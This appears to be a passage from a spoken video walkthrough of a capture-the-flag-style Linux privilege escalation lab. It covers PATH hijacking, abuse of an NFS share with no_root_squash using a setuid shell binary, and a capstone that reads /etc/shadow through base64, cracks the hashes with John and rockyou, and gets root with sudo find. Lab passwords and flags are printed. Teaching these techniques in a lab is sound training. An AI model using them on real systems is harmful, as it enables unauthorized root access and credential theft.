you will. Someone sets this, your administrator, it's not you. So echo, it's a variable is what it is. But this can be changed, okay? So keep that in mind. Any variable can be changed. But you can see here we have access to user, local, sbin, user, local, bin, user, blah, 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 so on and so forth, okay? So if a folder for which your user has write permissions is located in the path, meaning if any of these folders we can write to them, then we can actually hijack an application to run a script, meaning we can point our application to path and it will use that. Hopefully that makes sense to you guys. If it doesn't, you guys can read a little bit more about it. These ones are a little bit more complex than we have time to cover on just this little video. And when I say they're a little more complex, they're not more complex. They're just, if you're not familiar with Linux, you're not going to understand it right away. That's the only difference. So first thing we need to find out is what folders are located under path, which we've got here. And keep in mind that we can actually modify this. We can add them. So does your current user have write privileges for any of these folders? So some of these things, this is what we got to do. We've got to find the write privileges to see, can we write to any of these? Because if we can't write to them, then we don't have the vulnerability, right? So first things we're going to do, we already searched for the path, right? We've already figured that out. And here's our list of paths. So now we need to search for writable folders. So we need to go ahead and say find writable. Okay, it's important that you know that you're searching for writable. Then you're going to say to dev null, all that jazz, right? You don't want the all the errors. You might want them, I don't know. All right, now this part I'm just throwing in there for you to save you some time. You don't have to do this, but I'm going to go ahead and cut D, which is delimitator, and then we're going to say that's what we want to cut. We want to cut it there, okay? And then we're going to say F, and then we're going to say 2, 3. Now, if you guys aren't familiar with this command, that's okay. This is just saving you time because you can do it with just a regular find. It just will take you a long time. So, sort All right. So this is just giving us a clean version of what it is, okay? You don't have to do this. It's going to take a sec because it's still processing a bunch of stuff. Okay, so you can see that we're getting a lot of stuff, right? Well, the ones we're looking for is we're really looking for the user. Let's see. So we're looking for something that basically is out of the norm, I guess, if you will. So like right here, it's very weird that we have the home Murdoch. Why would we be able to write to Murdoch's home folder, right? So that's weird. So that right there tells me that we probably have, because that's probably in our right access. We'll go ahead and echo the path again to just see. Okay. And mind you guys, there's more searching going on typically in this, but because I already know the answer, and it gives you that same command right here. And there you go. Boom, boom, boom. Okay. And you can see here that from this, let's see. All right, so we have, like I said, we have write permissions for his home folder, which is, again, strange. But now, if we went into his folder, we would find the flag because we have permissions to look into his folder, obviously. So let's see here. All right. So there's the odd folder. That's the answer. Exploit the path vulnerability to read the contents of the flag. So what they want us to do is they want us to do this exact thing. You can see, going to be pretty easy. Give me a sec. We'll go ahead and go through this. I want to make sure that I'm not skipping steps for you guys because like that one, I skipped and gave you a big command. I want you to make sure you guys understand the process. I know we're an hour into this video, but I want to make sure you guys understand it, and it's not something that we're just completely, you're just getting the answers from me, if that makes sense. Okay, so we have the Murdoch. He's killing it. If we actually look at his home Murdoch, you can see there's a test file, and then there's a THM Python file. Okay, that's kind of weird. So what I'm going to do is I'm actually going to go into those files because I want to know what they are. So home Murdoch. Okay, and if you do an ls-la, you can see that the test here is actually an executable. So that's interesting. So let's go ahead and run it. It's a test. What's it matter, right? So we're going to go ahead and run it. We're just going to see what it does. Didn't mean to hit the second one. Okay, so you notice right there it says THM not found. So it's looking for a file named THM. So that's very interesting because what that means is if we can put a file in its path, which is hence this path, if we can put a file there named THM, it will run it because that's all it's looking for. It doesn't know what that THM file is supposed to be. It has no idea. So we're going to go ahead and put that in there, right? So first things first, we'll have to obviously create that, right? All right. So, sorry, I'm just looking for which one or what the executable we're going to create is the actual binary. So we can look at this thm.py because I don't even know what that is. Thm.py. I never looked at that in the last one. I just created one. So we'll go ahead and see. Okay, so this looks like it's actually just a Python script running. Okay, cool. Okay, so now what we're going to do is we're actually going to create a script named THM. So vim THM, okay? Because that's the file it needs. So there's different ways to do this. This is the way I like to do it. Bin bash, okay? And then we'll go ahead and say, what do we want to say? We want it to give us a root, basically a root access is what we really want. But we don't have to do that. To save us some time, we can actually do this. We can actually say sudo su because it's allowed to switch to a root user. Okay, and we can actually just leave it at that if we want to and just say whatever, you know. So let's see if that works. Let's see if that saves. Okay, so now if we run the Python, we still can't do freaking. So now if we run the test, okay, so it's still looking for THM. So we need to change that permission probably because it probably can't execute it. And we're gonna say THM, and now we're gonna say, okay, so THM not found. The reason for that is we need it to be in one of these paths, most likely, right? The one that we need. So let's go ahead and find the one that we need. All right, so what we need to do, we need to add that. So we need to export. And what we're doing is we're adding that path that we already know exists, these ones up here. We need to add his home directory. Home, Murdoch, and path. Now what this is going to do, it's going to tell that application that this is in the path and to look through this path for the THM, which is what it's looking for. Okay, and you see right there, it looked for THM in our paths, and it found it. And look, now it says root. So now we're root, all because all we did was sudo su. So now we can actually look for that flag. So find. Actually, we're not even going to look for it because of the time, because I know it's taking forever. So we're just going to cat it. So cat, I know where it is, so home mat flag 6.txt. All right, there it is. So it's in Matt's home directory, which is simple. Hopefully that made sense to you guys. I know I kind of got confused there for a second when because on my other one I did it when I did this before, I did it in the temporary directory. So I was confused as to why I wasn't seeing the temporary directory in here, but it was because I created it at the beginning last time rather than the end. So hopefully that didn't confuse you guys. But basically, if you're trying to figure out what I did, all it was you have write permissions, or you have permissions to the paths here. If you can directly find out which paths you have write permissions to, then write to them, and then add that path in. An application that you run will look in that path, in the paths that you have access to, and look for whatever it's trying to run. So you could be able to change, so you could basically create a secondary script that it calls upon, which is what we did there. All right. This one, NFS, privilege escalation, this one's pretty simple. This one I don't think is nearly as complex as some of the other examples, but we'll go ahead and cover it anyway. Basically, long story short, what we're doing here is network file shares. We're looking to mount one of the file shares that's supposed to be a network file share, right? We're going to mount it to our computer. When we mount it to our computer, we now can control the permissions. So we can give it sudo permissions so that we can run sudo permissions on that network file share, which then run on the server that it's sitting on. Most of the time this is going to be disabled, but if it's not, meaning that, so what we're looking for when we look at them here is, if we see it, no root squash. That's right there, right? What we're looking for. No root squash. So what that means is, if they don't have that, it means that we can actually, or if they have, I'm sorry, it means that we can actually run it and create our own executable with the SUID bit, meaning when we run it on the target system, it runs as sudo. It allows us to do it from our side, no matter what permissions are set on the other side, okay? So keep that in mind. It's not as common anymore because it's extremely insecure, right? If you can set the permissions for files on your box, what's the point of me setting any permissions, right? So that's why it's not really secure, but that's all right. All right, so Karen, we're back at it with Karen again. Karen at 10.10.27.143. Yes. All right, we're in it. So what we're going to do is we're going to look at the the etc exports, which is going to show us the file shares. And you can see here, these are examples. They're commented out, so don't worry about those. But you can see you've got home, backup, and temp, and then the shared folder. The temp has no root squash, so I'm just going to use the temp folder. You can use any of these three if you wanted to. I just personally like using the temp folder. That's just me. So what we're going to do is we don't have to go on here, but I like to go on here and ls. I like to go to cd temp, and then I like to create, so make a directory temp cd temp, cd temp. All right, so I like to be in a temporary directory if I'm going to do this, because I know I'm going to basically delete this. And so what I'm going to do is I'm going to say, okay, there's a couple commands we can do. We should see here that what they've got, but we can actually do a show mount. So this is going to show us what is actually mountable. And we can do this, excuse me, I did that from the wrong box. We can say show mount, okay? And what we're doing is we're going to basically request that they tell us what machine is, or what shares do you have that are mountable, meaning which ones can we mount to our machine as a network share. And if we hit it, there's our temp right there. So that's the one we're going to target. Now, we already made the directory that I want to create it for. So now we're going to say, okay, let's mount it. Mount 10.10.27.143. Okay, and then it's important that you know which one you're looking at, and we're looking at just temp, and then we're gonna just go ahead and say temp. Okay. Now if we hit ls, may have to back up one. Now if we go to cd temp ls, you can see that we actually have things in here, and those are the same things that should be in their temp folder. Same exact things. So now if we create a script in here, we can set the permissions on our machine as a network file share, and then run it on the target machine. Hopefully that makes sense to you guys. So this is our machine, and we're going to try and get it to where we can run it on their machine. So now we're going to create the payload. This is super simple. This is the same ones that we've done. We're going to do the same ones that they have over here. I know they have it right here, this int main. So I'm just going to do it on here because we can save it wherever we want. All right, so all we got to do. And you can always find these pretty much anywhere. Set. All right. Set UID. All right. And then system. We just need to specify what we want, and we want the bin bash. All right. And it's finishing it for us, so that's good. That's usually a good sign when it knows the coding language and it's finishing it for you. It means that you're doing it correctly usually. All right, so file, save as, and we're gonna say, we'll just save this as NFS for network file share, and we'll actually go to other locations, computer, temp, and we'll save it in here. So now save it. Now we've saved it. Now we need to actually look at it, and we need to set that SUID, because if we don't, then it can't run the way that we need it to. So first thing we want to do is we need to actually compile it, because it does take a compiler. So we need to go ahead and compile it. So we want NFS. First I forgot to save it with a .c. So we'll move it NFS to NFS.c. Okay, now we'll go ahead and compile it. Now the .c just specifies that it needs compiled, so that's just the type of file that it is, so keep that in mind that it does need that. All right, and then we're gonna write it out to NFS, just regular NFS is fine. And you guys can name them whatever you want. You don't have to name them anything. All right, so now we do want to change it to actually make the owner root. And you don't have to necessarily make the owner root, I don't believe, but excuse me, I do think it's best practice on these, just so that you don't run into any issues. Now, the change mod is obviously necessary to add the SUID bit that we've been looking for. Okay, so hopefully this makes sense to you guys. But now this NFS, we just did all that from our machine, but it's because we have it mounted to that network drive. All we got to do is go over here on theirs. Okay, and we should be able to run this simply as us, right? We should be able to run this, and it should run as root because, and you can see right there, we've got root access now. What it is because we're using that same set UID, but we just set it from our machine because it gave us that permission. It allowed us to do that. So that's all it's doing. Now, how many mountable shares can you identify in the target? There's 3. You can see that back here it was the temp, the, what was it, home Ubuntu share folder, and home backup. How many shares have the no root? All of them do, so 3. Gain a root shell, we did that. Now, what's the content of the flag? So cd home, cd map probably. Yep, cat flag 7.txt. And there's our flag number 7. Now the Capstone challenge, this one they just give you basically nothing. And you'll see it's pretty easy. After you've done all these boxes, you'll see that they gave you a pretty easy one, which I like because we've been going for an hour and 16 and I've been trying to rush through it, which is kind of why I've been all over the place. This is why I thought about breaking the video up into 2, but that's okay. This is fine. Because this is one of those things, if you do the work, meaning you actually sit here and you do it, you'll understand it. If you don't, you won't. So if you just watch it and then go finish the box, you're not going to understand this anyway. So I'm not necessarily directing these to those people. All right, so now the Capstone challenge, we've got to log in. Now we have Leonard and Penny. So we no longer have the silly freaking, the silly Karen. We've got Leonard and Penny. So this one, it's kind of a different stepped process, which I like because this is more of a realistic of what you'd be looking at as far as in a real situation. You're not going to be, in a real situation, it's not going to be necessarily as easy as we've seen. You're going to kind of have a little bit of struggles, and I think this is a little bit, good night, a little bit more of a better example because there's multiple steps in it. All right, so SSH into Leonard, and it may take a sec because it may not be up all the way yet. Maybe, we'll see. All right. Now, I will tell you guys, I'm not going to look for kernel exploits in this like I would normally. Like I would normally start searching for them and doing things like that, looking for version numbers and stuff. I'm not going to do that because of the time factor, but normally that's what I would recommend doing. We already know what we're trying to do, so I wouldn't get too crazy worried about that. But I would worry about why we can't SSH into it. 10.10.64.144. Yep. Okay. Well, while that's figuring itself out, we'll go ahead and talk about it. So basically, first thing we're going to do on this one is the same thing we did on, I believe it was either the Sudo or the SUID. I can't remember which one we did. But basically, we're going to go ahead and we're going to look for the SUID bit set, which is the same thing we did before. And the base 64 on this one allows us to use base 64 again. So, SSH, Leonard, at 10.10.64.144. I have no idea why SSH isn't working on it. Of course it's going to do it now. There we go. Okay. And then his password is penny123. And we're just going to do that instead of this because that one wasn't working. Okay. So we're in as Leonard. So first thing we would do is we would just do the same thing we normally do, enumerate, and find the fault. Now the fault, first one I found is the base 64, so we can do the base 64 just like before. So base 64, and we're gonna say etc shadow, and then base 64 decode, and you can see that we get all of these options. Now you don't necessarily have to save all of them, or sorry, not save all of them. You don't necessarily have to copy all of them. You can copy one or two, but I like to have them all. So we'll paste this. This is the shadow file, so save as, and I will save it under desktop just to make it easy. And I'll save this as shadow.txt. Okay, and then from there, we'll go ahead and do the password. So we can do that exact same one, but instead of shadow, do password. And take that. Now make sure you don't go too far, because earlier I went too far and I started copying the shadow file again. So keep that in mind. Paste, file, save as, and we're going to go back to desktop, and we'll say password.txt. Okay, so we've got those two. That's perfect. We'll go ahead and minimize that for a second. Whoops. Open new terminal. I don't like that. I'll open a new tab. All right, so we've got the base 64. We've got that. We're good. We're good. We're good. We got the. Now we need to go ahead and unshadow password. Well, first let's just go to our desktop. And then there we go. So now sudo, we don't even need sudo because we're already root. So unshadow password.txt and shadow.txt, and we'll say cracked.txt like we did before. Boom. Now we just need to go to John, word lists equals, and we'll say user share word list rock you. If you guys are wondering, this is the location for the rock you every single time, and we're gonna name it, or we're gonna use our cracked.txt, and we'll let it run, and hopefully this will find it. Well, there's Missy's password, so we have Missy's password right there, so we can log in as Missy. So they're perfect. So now let's go ahead back here, and let's go ahead and switch user Missy, and her password was password1. And by the way, you can actually, if you feel froggy, you could have just guessed that. So now we're gonna say ls, let's see, find. Actually, I'm not even gonna look for it. I'm just gonna go into it. CD documents. But normally you would find it, cat flag 1.txt. All right, and there it is. So thm 42828719920544. All right, there's the first flag. Now, the problem is we still don't have root permissions. We could sit here and wait for this, and it might eventually get the root password. I don't know if it's in there, but that's not what we want to do. So now what do we have to do? Well, that's pretty easy. We just have to find, let's see. We just have to figure out what they can run as sudo, which I'm not going to necessarily waste the time with you guys. We've already done this. It's the find command. You can actually use the find command again. So go ahead and use the sudo find like we did before, except for you're going to go ahead and go on GTFO bins and look for this find command and find what you can run with it. So we're going to do find. And this is just in the presence of time, guys. I normally would go through all this, but we've already covered it 2 or 3 times. By the time we get to the end, I'm not going to keep covering it. So there's bin shell and then the quit. Boom. And you'll see that we now have who am I and we have root. So now we can find the regular flag, which is, okay, there it is. Flag, oh, that's flag 1, excuse me. So cd home root cd home. Okay, root flag, smooth. All right, so now cat flag2.txt, and there it is, guys. So it's thm 168824782390238. That's it, guys. Hopefully you guys like this. I know it's really long. There's a lot to watch, but I really did take my time on this to try and find the best way. I even wrote it up over here for me to find the best way to explain things to you guys while also still letting you guys do it, and also not. My biggest concern here was trying to get all the knowledge there without making this video 5 hours, right? Because you could dive into these so much deeper, but I think it's important that you guys understand it and know how to research it, not how to memorize it, which I think is important. So hopefully you guys liked it. If you did, subscribe, like it. This was a really long video to make. It took me like probably 9 or 10 hours to make because I had to do the boxes, then find a way to make it make sense on a video, then record it, so on and so forth. So hopefully you guys liked it. This was a very long video, but I definitely think it's really good information. And we have one more video, guys, and then we're done with the freaking series. So let's go. Thank you, guys, and I really appreciate it. We're reached 300 subs, so let's go, guys. Thank you so much.